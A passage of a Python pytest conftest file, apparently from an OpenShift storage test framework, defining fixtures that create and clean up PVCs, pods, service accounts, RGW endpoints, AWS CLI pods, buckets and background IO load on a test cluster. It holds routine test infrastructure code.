def teardown_factory_class(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="session")
def teardown_factory_session(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="function")
def teardown_factory(request):
return teardown_factory_fixture(request)
def teardown_factory_fixture(request):
"""
Tearing down a resource that was created during the test
To use this factory, you'll need to pass 'teardown_factory' to your test
function and call it in your test when a new resource was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_factory):
pvc_obj = create_pvc()
teardown_factory(pvc_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCS object or list of OCS objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
"""
Delete the resources created in the test
"""
for instance in instances[::-1]:
if not instance.is_deleted:
reclaim_policy = (
instance.reclaim_policy if instance.kind == constants.PVC else None
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
if reclaim_policy == constants.RECLAIM_POLICY_DELETE:
helpers.validate_pv_delete(instance.backed_pv)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def service_account_factory_class(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="session")
def service_account_factory_session(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="function")
def service_account_factory(request):
return service_account_factory_fixture(request)
def service_account_factory_fixture(request):
"""
Create a service account
"""
instances = []
active_service_account_obj = None
def factory(project=None, service_account=None):
"""
Args:
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
service_account (str): service_account_name
Returns:
object: serviceaccount instance.
"""
nonlocal active_service_account_obj
if active_service_account_obj and not service_account:
return active_service_account_obj
elif service_account:
sa_obj = helpers.get_serviceaccount_obj(
sa_name=service_account, namespace=project.namespace
)
if not helpers.validate_scc_policy(
sa_name=service_account, namespace=project.namespace
):
helpers.add_scc_policy(
sa_name=service_account, namespace=project.namespace
)
sa_obj.project = project
active_service_account_obj = sa_obj
instances.append(sa_obj)
return sa_obj
else:
sa_obj = helpers.create_serviceaccount(
namespace=project.namespace,
)
sa_obj.project = project
active_service_account_obj = sa_obj
helpers.add_scc_policy(sa_name=sa_obj.name, namespace=project.namespace)
assert sa_obj, "Failed to create serviceaccount"
instances.append(sa_obj)
return sa_obj
def finalizer():
"""
Delete the service account
"""
for instance in instances:
helpers.remove_scc_policy(
sa_name=instance.name, namespace=instance.namespace
)
instance.delete()
instance.ocp.wait_for_delete(resource_name=instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def dc_pod_factory(request, pvc_factory, service_account_factory):
"""
Create deploymentconfig pods
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
service_account=None,
size=None,
custom_data=None,
node_name=None,
node_selector=None,
replica_count=1,
raw_block_pv=False,
sa_obj=None,
wait=True,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
service_account (str): service account name for dc_pods
size (int): The requested size for the PVC
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
node_name (str): The name of specific node to schedule the pod
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
replica_count (int): Replica count for deployment config
raw_block_pv (str): True if pod with raw block pvc
sa_obj (object) : If specific service account is needed
"""
if custom_data:
dc_pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface, size=size)
sa_obj = sa_obj or service_account_factory(
project=pvc.project, service_account=service_account
)
dc_pod_obj = helpers.create_pod(
interface_type=interface,
pvc_name=pvc.name,
do_reload=False,
namespace=pvc.namespace,
sa_name=sa_obj.name,
dc_deployment=True,
replica_count=replica_count,
node_name=node_name,
node_selector=node_selector,
raw_block_pv=raw_block_pv,
pod_dict_path=constants.FEDORA_DC_YAML,
)
instances.append(dc_pod_obj)
log.info(dc_pod_obj.name)
if wait:
helpers.wait_for_resource_state(
dc_pod_obj, constants.STATUS_RUNNING, timeout=180
)
dc_pod_obj.pvc = pvc
return dc_pod_obj
def finalizer():
"""
Delete dc pods
"""
for instance in instances:
delete_deploymentconfig_pods(instance)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def polarion_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures polarion testsuite properties for junit xml
"""
polarion_project_id = config.REPORTING["polarion"]["project_id"]
record_testsuite_property("polarion-project-id", polarion_project_id)
jenkins_build_url = config.RUN.get("jenkins_build_url")
if jenkins_build_url:
record_testsuite_property("polarion-custom-description", jenkins_build_url)
polarion_testrun_name = get_testrun_name()
record_testsuite_property("polarion-testrun-id", polarion_testrun_name)
record_testsuite_property("polarion-testrun-status-id", "inprogress")
record_testsuite_property("polarion-custom-isautomated", "True")
@pytest.fixture(scope="session", autouse=True)
def additional_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures additional custom testsuite properties for junit xml
"""
# add logs url
logs_url = config.RUN.get("logs_url")
if logs_url:
record_testsuite_property("logs-url", logs_url)
# add run_id
record_testsuite_property("run_id", config.RUN["run_id"])
# Report Portal
launch_name = reporting.get_rp_launch_name()
record_testsuite_property("rp_launch_name", launch_name)
launch_description = reporting.get_rp_launch_description()
record_testsuite_property("rp_launch_description", launch_description)
attributes = reporting.get_rp_launch_attributes()
for key, value in attributes.items():
# Prefix with `rp_` so the rp_preproc upload script knows to use the property
record_testsuite_property(f"rp_{key}", value)
launch_url = config.REPORTING.get("rp_launch_url")
if launch_url:
record_testsuite_property("rp_launch_url", launch_url)
@pytest.fixture(scope="session")
def tier_marks_name():
"""
Gets the tier mark names
Returns:
list: list of tier mark names
"""
tier_marks_name = []
for each_tier in tier_marks:
try:
tier_marks_name.append(each_tier.name)
except AttributeError:
tier_marks_name.append(each_tier().args[0].name)
return tier_marks_name
@pytest.fixture(scope="function", autouse=True)
def health_checker(request, tier_marks_name):
skipped = False
dev_mode = config.RUN["cli_params"].get("dev_mode")
if dev_mode:
log.info("Skipping health checks for development mode")
return
def finalizer():
if not skipped:
try:
teardown = config.RUN["cli_params"]["teardown"]
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
mcg_only_deployment = config.ENV_DATA["mcg_only_deployment"]
if not (teardown or skip_ocs_deployment or mcg_only_deployment):
ceph_health_check_base()
log.info("Ceph health check passed at teardown")
except CephHealthException:
log.info("Ceph health check failed at teardown")
# Retrying to increase the chance the cluster health will be OK
# for next test
ceph_health_check()
raise
node = request.node
request.addfinalizer(finalizer)
for mark in node.iter_markers():
if mark.name in tier_marks_name:
log.info("Checking for Ceph Health OK ")
try:
status = ceph_health_check_base()
if status:
log.info("Ceph health check passed at setup")
return
except CephHealthException:
skipped = True
# skip because ceph is not in good health
pytest.skip("Ceph health check failed at setup")
@pytest.fixture(scope="session", autouse=True)
def cluster(request, log_cli_level):
"""
This fixture initiates deployment for both OCP and OCS clusters.
Specific platform deployment classes will handle the fine details
of action
"""
log.info(f"All logs located at {ocsci_log_path()}")
teardown = config.RUN["cli_params"]["teardown"]
deploy = config.RUN["cli_params"]["deploy"]
if teardown or deploy:
factory = dep_factory.DeploymentFactory()
deployer = factory.get_deployment()
# Add a finalizer to teardown the cluster after test execution is finished
if teardown:
def cluster_teardown_finalizer():
# If KMS is configured, clean up the backend resources
# we are doing it before OCP cleanup
if config.DEPLOYMENT.get("kms_deployment"):
kms = KMS.get_kms_deployment()
kms.cleanup()
deployer.destroy_cluster(log_cli_level)
request.addfinalizer(cluster_teardown_finalizer)
log.info("Will teardown cluster because --teardown was provided")
# Download client
if config.DEPLOYMENT["skip_download_client"]:
log.info("Skipping client download")
else:
force_download = (
config.RUN["cli_params"].get("deploy")
and config.DEPLOYMENT["force_download_client"]
)
get_openshift_client(force_download=force_download)
# set environment variable for early testing of RHCOS
if config.ENV_DATA.get("early_testing"):
release_img = config.ENV_DATA["RELEASE_IMG"]
log.info(f"Running early testing of RHCOS with release image: {release_img}")
os.environ["RELEASE_IMG"] = release_img
os.environ["OPENSHIFT_INSTALL_RELEASE_IMAGE_OVERRIDE"] = release_img
if deploy:
# Deploy cluster
deployer.deploy_cluster(log_cli_level)
else:
if config.ENV_DATA["platform"] == constants.IBMCLOUD_PLATFORM:
ibmcloud.login()
@pytest.fixture(scope="class")
def environment_checker(request):
node = request.node
# List of marks for which we will ignore the leftover checker
marks_to_ignore = [m.mark for m in [deployment, ignore_leftovers]]
# app labels of resources to be excluded for leftover check
exclude_labels = [constants.must_gather_pod_label]
for mark in node.iter_markers():
if mark in marks_to_ignore:
return
if mark.name == ignore_leftover_label.name:
exclude_labels.extend(list(mark.args))
request.addfinalizer(
partial(get_status_after_execution, exclude_labels=exclude_labels)
)
get_status_before_execution(exclude_labels=exclude_labels)
@pytest.fixture(scope="session")
def log_cli_level(pytestconfig):
"""
Retrieves the log_cli_level set in pytest.ini
Returns:
str: log_cli_level set in pytest.ini or DEBUG if not set
"""
return pytestconfig.getini("log_cli_level") or "DEBUG"
@pytest.fixture(scope="session", autouse=True)
def cluster_load(
request,
project_factory_session,
pvc_factory_session,
service_account_factory_session,
pod_factory_session,
):
"""
Run IO during the test execution
"""
cl_load_obj = None
io_in_bg = config.RUN.get("io_in_bg")
log_utilization = config.RUN.get("log_utilization")
io_load = config.RUN.get("io_load")
cluster_load_error = None
cluster_load_error_msg = (
"Cluster load might not work correctly during this run, because "
"it failed with an exception: %s"
)
# IO load should not happen during deployment
deployment_test = (
True if ("deployment" in request.node.items[0].location[0]) else False
)
if io_in_bg and not deployment_test:
io_load = int(io_load) * 0.01
log.info(wrap_msg("Tests will be running while IO is in the background"))
log.info(
"Start running IO in the background. The amount of IO that "
"will be written is going to be determined by the cluster "
"capabilities according to its limit"
)
try:
cl_load_obj = ClusterLoad(
project_factory=project_factory_session,
sa_factory=service_account_factory_session,
pvc_factory=pvc_factory_session,
pod_factory=pod_factory_session,
target_percentage=io_load,
)
cl_load_obj.reach_cluster_load_percentage()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
if (log_utilization or io_in_bg) and not deployment_test:
if not cl_load_obj:
try:
cl_load_obj = ClusterLoad()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
config.RUN["load_status"] = "running"
def finalizer():
"""
Stop the thread that executed watch_load()
"""
config.RUN["load_status"] = "finished"
if thread:
thread.join()
if cluster_load_error:
raise cluster_load_error
request.addfinalizer(finalizer)
def watch_load():
"""
Watch the cluster load by monitoring the cluster latency.
Print the cluster utilization metrics every 15 seconds.
If IOs are running in the test background, dynamically adjust
the IO load based on the cluster latency.
"""
while config.RUN["load_status"] != "finished":
time.sleep(20)
try:
cl_load_obj.print_metrics(mute_logs=True)
if io_in_bg:
if config.RUN["load_status"] == "running":
cl_load_obj.adjust_load_if_needed()
elif config.RUN["load_status"] == "to_be_paused":
cl_load_obj.reduce_load(pause=True)
config.RUN["load_status"] = "paused"
elif config.RUN["load_status"] == "to_be_reduced":
cl_load_obj.reduce_load(pause=False)
config.RUN["load_status"] = "reduced"
elif config.RUN["load_status"] == "to_be_resumed":
cl_load_obj.resume_load()
config.RUN["load_status"] = "running"
# Any type of exception should be caught and we should continue.
# We don't want any test to fail
except Exception:
continue
thread = threading.Thread(target=watch_load)
thread.start()
def resume_cluster_load_implementation():
"""
Resume cluster load implementation
"""
config.RUN["load_status"] = "to_be_resumed"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status == "running":
break
except TimeoutExpiredError:
log.error("Cluster load was not resumed successfully")
def reduce_cluster_load_implementation(request, pause, resume=True):
"""
Pause/reduce the background cluster load
Args:
pause (bool): True for completely pausing the cluster load, False for reducing it by 50%
resume (bool): True for resuming the cluster load upon teardown, False for not resuming
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
if resume:
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
config.RUN["load_status"] = "to_be_paused" if pause else "to_be_reduced"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status in ["paused", "reduced"]:
break
except TimeoutExpiredError:
log.error(
f"Cluster load was not {'paused' if pause else 'reduced'} successfully"
)
@pytest.fixture()
def pause_cluster_load(request):
"""
Pause the background cluster load without resuming it
"""
reduce_cluster_load_implementation(request=request, pause=True, resume=False)
@pytest.fixture()
def resume_cluster_load(request):
"""
Resume the background cluster load
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
@pytest.fixture()
def pause_and_resume_cluster_load(request):
"""
Pause the background cluster load and resume it in teardown to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=True)
@pytest.fixture()
def reduce_and_resume_cluster_load(request):
"""
Reduce the background cluster load to be 50% of what it is and resume the load in teardown
to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=False)
@pytest.fixture(
params=[
pytest.param({"interface": constants.CEPHBLOCKPOOL}),
pytest.param({"interface": constants.CEPHFILESYSTEM}),
],
ids=["RBD", "CephFS"],
)
def interface_iterate(request):
"""
Iterate over interfaces - CephBlockPool and CephFileSystem
"""
return request.param["interface"]
@pytest.fixture(scope="class")
def multi_pvc_factory_class(project_factory_class, pvc_factory_class):
return multi_pvc_factory_fixture(project_factory_class, pvc_factory_class)
@pytest.fixture(scope="session")
def multi_pvc_factory_session(project_factory_session, pvc_factory_session):
return multi_pvc_factory_fixture(project_factory_session, pvc_factory_session)
@pytest.fixture(scope="function")
def multi_pvc_factory(project_factory, pvc_factory):
return multi_pvc_factory_fixture(project_factory, pvc_factory)
def multi_pvc_factory_fixture(project_factory, pvc_factory):
"""
Create a Persistent Volume Claims factory. Calling this fixture creates a
set of new PVCs. Options for PVC creation based on provided assess modes:
1. For each PVC, choose random value from the list of access modes
2. Create PVCs based on the specified distribution number of access modes.
Create sets of PVCs based on the order of access modes.
3. Create PVCs based on the specified distribution number of access modes.
The order of PVC creation is independent of access mode.
"""
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_modes=None,
access_modes_selection="distribute_sequential",
access_mode_dist_ratio=None,
status=constants.STATUS_BOUND,
num_of_pvc=1,
wait_each=False,
timeout=60,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_modes (list): List of access modes. One of the access modes
will be chosen for creating each PVC. If not specified,
ReadWriteOnce will be selected for all PVCs. To specify
volume mode, append volume mode in the access mode name
separated by '-'.
eg: ['ReadWriteOnce', 'ReadOnlyMany', 'ReadWriteMany',
'ReadWriteMany-Block']
access_modes_selection (str): Decides how to select accessMode for
each PVC from the options given in 'access_modes' list.
Values are 'select_random', 'distribute_random'
'select_random' : While creating each PVC, one access mode will
be selected from the 'access_modes' list.
'distribute_random' : The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will not be based on the access modes. For example, 1st and
6th PVC might have same access mode.
'distribute_sequential' :The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will be as sets of PVCs of same assess mode. For example,
first set of 10 will be having same access mode followed by
next set of 13 with a different access mode.
access_mode_dist_ratio (list): Contains the number of PVCs to be
created for each access mode. If not specified, the given list
of access modes will be equally distributed among the PVCs.
eg: [10,12] for num_of_pvc=22 and
access_modes=['ReadWriteOnce', 'ReadWriteMany']
status (str): If provided then factory waits for object to reach
desired state.
num_of_pvc(int): Number of PVCs to be created
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
timeout(int): Time in seconds to wait
Returns:
list: objects of PVC class.
"""
pvc_list = []
if wait_each:
status_tmp = status
else:
status_tmp = ""
project = project or project_factory()
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
access_modes = access_modes or [constants.ACCESS_MODE_RWO]
access_modes_list = []
if access_modes_selection == "select_random":
for _ in range(num_of_pvc):
mode = random.choice(access_modes)
access_modes_list.append(mode)
else:
if not access_mode_dist_ratio:
num_of_modes = len(access_modes)
dist_val = floor(num_of_pvc / num_of_modes)
access_mode_dist_ratio = [dist_val] * num_of_modes
access_mode_dist_ratio[-1] = dist_val + (num_of_pvc % num_of_modes)
zipped_share = list(zip(access_modes, access_mode_dist_ratio))
for mode, share in zipped_share:
access_modes_list.extend([mode] * share)
if access_modes_selection == "distribute_random":
random.shuffle(access_modes_list)
for access_mode in access_modes_list:
if "-" in access_mode:
access_mode, volume_mode = access_mode.split("-")
else:
volume_mode = ""
pvc_obj = pvc_factory(
interface=interface,
project=project,
storageclass=storageclass,
size=size,
access_mode=access_mode,
status=status_tmp,
volume_mode=volume_mode,
)
pvc_list.append(pvc_obj)
pvc_obj.project = project
if status and not wait_each:
for pvc_obj in pvc_list:
helpers.wait_for_resource_state(pvc_obj, status, timeout=timeout)
return pvc_list
return factory
@pytest.fixture(scope="function")
def memory_leak_function(request):
"""
Function to start Memory leak thread which will be executed parallel with test run
Memory leak data will be captured in all worker nodes for ceph-osd process
Data will be appended in /tmp/(worker)-top-output.txt file for each worker
During teardown created tmp files will be deleted
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
def finalizer():
"""
Finalizer to stop memory leak data capture thread and cleanup the files
"""
set_flag_status("terminated")
try:
for status in TimeoutSampler(90, 3, get_flag_status):
if status == "terminated":
break
except TimeoutExpiredError:
log.warning(
"Background test execution still in progress before"
"memory leak thread terminated"
)
if thread:
thread.join()
log_path = ocsci_log_path()
for worker in node.get_worker_nodes():
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
copyfile(
f"/tmp/{worker}-top-output.txt",
f"{log_path}/{worker}-top-output.txt",
)
os.remove(f"/tmp/{worker}-top-output.txt")
log.info("Memory leak capture has stopped")
request.addfinalizer(finalizer)
temp_file = tempfile.NamedTemporaryFile(
mode="w+", prefix="test_status", delete=False
)
def get_flag_status():
with open(temp_file.name, "r") as t_file:
return t_file.readline()
def set_flag_status(value):
with open(temp_file.name, "w") as t_file:
t_file.writelines(value)
set_flag_status("running")
def run_memory_leak_in_bg():
"""
Function to run memory leak in background thread
Memory leak data is written in below format
date time PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
"""
oc = ocp.OCP(namespace=config.ENV_DATA["cluster_namespace"])
while get_flag_status() == "running":
for worker in node.get_worker_nodes():
filename = f"/tmp/{worker}-top-output.txt"
top_cmd = f"debug nodes/{worker} -- chroot /host top -n 2 b"
with open("/tmp/file.txt", "w+") as temp:
temp.write(
str(oc.exec_oc_cmd(command=top_cmd, out_yaml_format=False))
)
temp.seek(0)
for line in temp:
if line.__contains__("ceph-osd"):
with open(filename, "a+") as f:
f.write(str(datetime.now()))
f.write(" ")
f.write(line)
log.info("Start memory leak data capture in the test background")
thread = threading.Thread(target=run_memory_leak_in_bg)
thread.start()
@pytest.fixture()
def aws_obj():
"""
Initialize AWS instance
Returns:
AWS: An instance of AWS class
"""
aws_obj = aws.AWS()
return aws_obj
@pytest.fixture()
def ec2_instances(request, aws_obj):
"""
Get cluster instances
Returns:
dict: The ID keys and the name values of the instances
"""
# Get all cluster nodes objects
nodes = node.get_node_objs()
# Get the cluster nodes ec2 instances
ec2_instances = aws.get_instances_ids_and_names(nodes)
assert (
ec2_instances
), f"Failed to get ec2 instances for node {[n.name for n in nodes]}"
def finalizer():
"""
Make sure all instances are running
"""
# Getting the instances that are in status 'stopping' (if there are any), to wait for them to
# get to status 'stopped' so it will be possible to start them
stopping_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPING)
}
# Waiting fot the instances that are in status 'stopping'
# (if there are any) to reach 'stopped'
if stopping_instances:
for stopping_instance in stopping_instances:
instance = aws_obj.get_ec2_instance(stopping_instance.key())
instance.wait_until_stopped()
stopped_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPED)
}
# Start the instances
if stopped_instances:
aws_obj.start_ec2_instances(instances=stopped_instances, wait=True)
request.addfinalizer(finalizer)
return ec2_instances
@pytest.fixture(scope="session")
def cld_mgr(request, rgw_endpoint):
"""
Returns a cloud manager instance that'll be used throughout the session
Returns:
CloudManager: A CloudManager resource
"""
cld_mgr = CloudManager()
def finalizer():
for client in vars(cld_mgr):
try:
getattr(cld_mgr, client).secret.delete()
except AttributeError:
log.info(f"{client} secret not found")
request.addfinalizer(finalizer)
return cld_mgr
@pytest.fixture()
def rgw_obj(request):
return rgw_obj_fixture(request)
@pytest.fixture(scope="session")
def rgw_obj_session(request):
return rgw_obj_fixture(request)
def rgw_obj_fixture(request):
"""
Returns an RGW resource that represents RGW in the cluster
Returns:
RGW: An RGW resource
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
return RGW()
else:
return None
@pytest.fixture()
def rgw_deployments(request):
"""
Return RGW deployments or skip the test.
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
# Force-skipping in case of IBM Cloud -
# https://github.com/red-hat-storage/ocs-ci/issues/3863
if config.ENV_DATA["platform"].lower() == constants.IBMCLOUD_PLATFORM:
pytest.skip(
"RGW deployments were found, but test will be skipped because of BZ1926831"
)
return rgw_deployments
else:
pytest.skip("There is no RGW deployment available for this test.")
@pytest.fixture(scope="session")
def rgw_endpoint(request):
"""
Expose RGW service and return external RGW endpoint address if available.
Returns:
string: external RGW endpoint
"""
log.info("Looking for RGW service to expose")
oc = ocp.OCP(kind=constants.SERVICE, namespace=config.ENV_DATA["cluster_namespace"])
rgw_service = oc.get(selector=constants.RGW_APP_LABEL)["items"]
if rgw_service:
if config.DEPLOYMENT["external_mode"]:
rgw_service = constants.RGW_SERVICE_EXTERNAL_MODE
else:
rgw_service = constants.RGW_SERVICE_INTERNAL_MODE
log.info(f"Service {rgw_service} found and will be exposed")
# custom hostname is provided because default hostname from rgw service
# is too long and OCP rejects it
oc = ocp.OCP(
kind=constants.ROUTE, namespace=config.ENV_DATA["cluster_namespace"]
)
route = oc.get(resource_name="noobaa-mgmt")
router_hostname = route["status"]["ingress"][0]["routerCanonicalHostname"]
rgw_hostname = f"rgw.{router_hostname}"
try:
oc.exec_oc_cmd(f"expose service/{rgw_service} --hostname {rgw_hostname}")
except CommandFailed as cmdfailed:
if "AlreadyExists" in str(cmdfailed):
log.warning("RGW route already exists.")
# new route is named after service
rgw_endpoint = oc.get(resource_name=rgw_service)
endpoint_obj = OCS(**rgw_endpoint)
def _finalizer():
endpoint_obj.delete()
request.addfinalizer(_finalizer)
return f"http://{rgw_hostname}"
else:
log.info("RGW service is not available")
@pytest.fixture()
def mcg_obj(request):
return mcg_obj_fixture(request)
@pytest.fixture(scope="session")
def mcg_obj_session(request):
return mcg_obj_fixture(request)
def mcg_obj_fixture(request, *args, **kwargs):
"""
Returns an MCG resource that's connected to the S3 endpoint
Returns:
MCG: An MCG resource
"""
if config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM:
log.warning("As openshift dedicated is used, no MCG resource is returned")
return None
mcg_obj = MCG(*args, **kwargs)
def finalizer():
if config.ENV_DATA["platform"].lower() == "aws":
mcg_obj.cred_req_obj.delete()
if kwargs.get("create_aws_creds"):
request.addfinalizer(finalizer)
return mcg_obj
@pytest.fixture()
def awscli_pod(request):
return awscli_pod_fixture(request, scope_name="function")
@pytest.fixture(scope="session")
def awscli_pod_session(request):
return awscli_pod_fixture(request, scope_name="session")
def awscli_pod_fixture(request, scope_name):
"""
Creates a new AWSCLI pod for relaying commands
Args:
scope_name (str): The name of the fixture's scope,
used for giving a descriptive name to the pod and configmap
Returns:
pod: A pod running the AWS CLI
"""
# Create the service-ca configmap to be mounted upon pod creation
service_ca_data = templating.load_yaml(constants.AWSCLI_SERVICE_CA_YAML)
service_ca_configmap_name = create_unique_resource_name(
constants.AWSCLI_SERVICE_CA_CONFIGMAP_NAME, scope_name
)
service_ca_data["metadata"]["name"] = service_ca_configmap_name
log.info("Trying to create the AWS CLI service CA")
service_ca_configmap = helpers.create_resource(**service_ca_data)
arch = get_system_architecture()
if arch.startswith("x86"):
pod_dict_path = constants.AWSCLI_POD_YAML
else:
pod_dict_path = constants.AWSCLI_MULTIARCH_POD_YAML
awscli_pod_dict = templating.load_yaml(pod_dict_path)
awscli_pod_dict["spec"]["volumes"][0]["configMap"][
"name"
] = service_ca_configmap_name
awscli_pod_name = create_unique_resource_name(
constants.AWSCLI_RELAY_POD_NAME, scope_name
)
awscli_pod_dict["metadata"]["name"] = awscli_pod_name
update_container_with_mirrored_image(awscli_pod_dict)
awscli_pod_obj = Pod(**awscli_pod_dict)
assert awscli_pod_obj.create(
do_reload=True
), f"Failed to create Pod {awscli_pod_name}"
OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE, kind="ConfigMap").wait_for_resource(
resource_name=service_ca_configmap.name, column="DATA", condition="1"
)
helpers.wait_for_resource_state(awscli_pod_obj, constants.STATUS_RUNNING)
def _awscli_pod_cleanup():
awscli_pod_obj.delete()
service_ca_configmap.delete()
request.addfinalizer(_awscli_pod_cleanup)
return awscli_pod_obj
@pytest.fixture()
def test_directory_setup(request, awscli_pod_session):
return test_directory_setup_fixture(request, awscli_pod_session)
def test_directory_setup_fixture(request, awscli_pod_session):
origin_dir, result_dir = setup_pod_directories(
awscli_pod_session, ["origin", "result"]
)
SetupDirs = namedtuple("SetupDirs", "origin_dir, result_dir")
def dir_cleanup():
test_name = get_current_test_name()
awscli_pod_session.exec_cmd_on_pod(command=f"rm -rf {test_name}")
request.addfinalizer(dir_cleanup)
return SetupDirs(origin_dir=origin_dir, result_dir=result_dir)
@pytest.fixture()
def nodes():
"""
Return an instance of the relevant platform nodes class
(e.g. AWSNodes, VMWareNodes) to be later used in the test
for nodes related operations, like nodes restart,
detach/attach volume, etc.
"""
factory = platform_nodes.PlatformNodesFactory()
nodes = factory.get_nodes_platform()
return nodes
@pytest.fixture()
def uploaded_objects(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
return uploaded_objects_fixture(
request, mcg_obj, awscli_pod, verify_rgw_restart_count
)
@pytest.fixture(scope="session")
def uploaded_objects_session(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
):
return uploaded_objects_fixture(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
)
def uploaded_objects_fixture(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
"""
Deletes all objects that were created as part of the test
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
awscli_pod (Pod): A pod running the AWSCLI tools
Returns:
list: An empty list of objects
"""
uploaded_objects_paths = []
def object_cleanup():
for uploaded_filename in uploaded_objects_paths:
log.info(f"Deleting object {uploaded_filename}")
awscli_pod.exec_cmd_on_pod(
command=craft_s3_command("rm " + uploaded_filename, mcg_obj),
secrets=[
mcg_obj.access_key_id,
mcg_obj.access_key,
mcg_obj.s3_internal_endpoint,
],
)
request.addfinalizer(object_cleanup)
return uploaded_objects_paths
@pytest.fixture()
def verify_rgw_restart_count(request):
return verify_rgw_restart_count_fixture(request)
@pytest.fixture(scope="session")
def verify_rgw_restart_count_session(request):
return verify_rgw_restart_count_fixture(request)
def verify_rgw_restart_count_fixture(request):
"""
Verifies the RGW restart count at start and end of a test
"""
if config.ENV_DATA["platform"].lower() in constants.ON_PREM_PLATFORMS:
log.info("Getting RGW pod restart count before executing the test")
initial_counts = get_rgw_restart_counts()
def finalizer():
rgw_pods = get_rgw_pods()
for rgw_pod in rgw_pods:
rgw_pod.reload()
log.info("Verifying whether RGW pods changed after executing the test")
for rgw_pod in rgw_pods:
assert rgw_pod.restart_count in initial_counts, "RGW pod restarted"
request.addfinalizer(finalizer)
@pytest.fixture()
def rgw_bucket_factory(request, rgw_obj):
if rgw_obj:
return bucket_factory_fixture(request, rgw_obj=rgw_obj)
else:
return None
@pytest.fixture(scope="session")
def rgw_bucket_factory_session(request, rgw_obj_session):
if rgw_obj_session:
return bucket_factory_fixture(request, rgw_obj=rgw_obj_session)
else:
return None
@pytest.fixture()
def bucket_factory(request, bucket_class_factory, mcg_obj):
"""
Returns an MCG bucket factory.
If MCG object not found returns None
"""
if mcg_obj:
return bucket_factory_fixture(request, bucket_class_factory, mcg_obj)
else:
return None
@pytest.fixture(scope="session")
def bucket_factory_session(request, bucket_class_factory_session, mcg_obj_session):
"""
Returns a session-scoped MCG bucket factory.
If session-scoped MCG object not found returns None
"""
if mcg_obj_session:
return bucket_factory_fixture(
request, bucket_class_factory_session, mcg_obj_session
)
else:
return None
def bucket_factory_fixture(
request, bucket_class_factory=None, mcg_obj=None, rgw_obj=None
):
"""
Create a bucket factory. Calling this fixture creates a new bucket(s).
For a custom amount, provide the 'amount' parameter.
***Please note***
Creation of buckets by utilizing the S3 interface *does not* support bucketclasses.
Only OC/CLI buckets can support different bucketclasses.
By default, all S3 buckets utilize the default bucketclass.
Args:
bucket_class_factory: creates a new Bucket Class
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
rgw_obj (RGW): An RGW object
"""
created_buckets = []
def _create_buckets(
amount=1,
interface="S3",
verify_health=True,
bucketclass=None,
replication_policy=None,
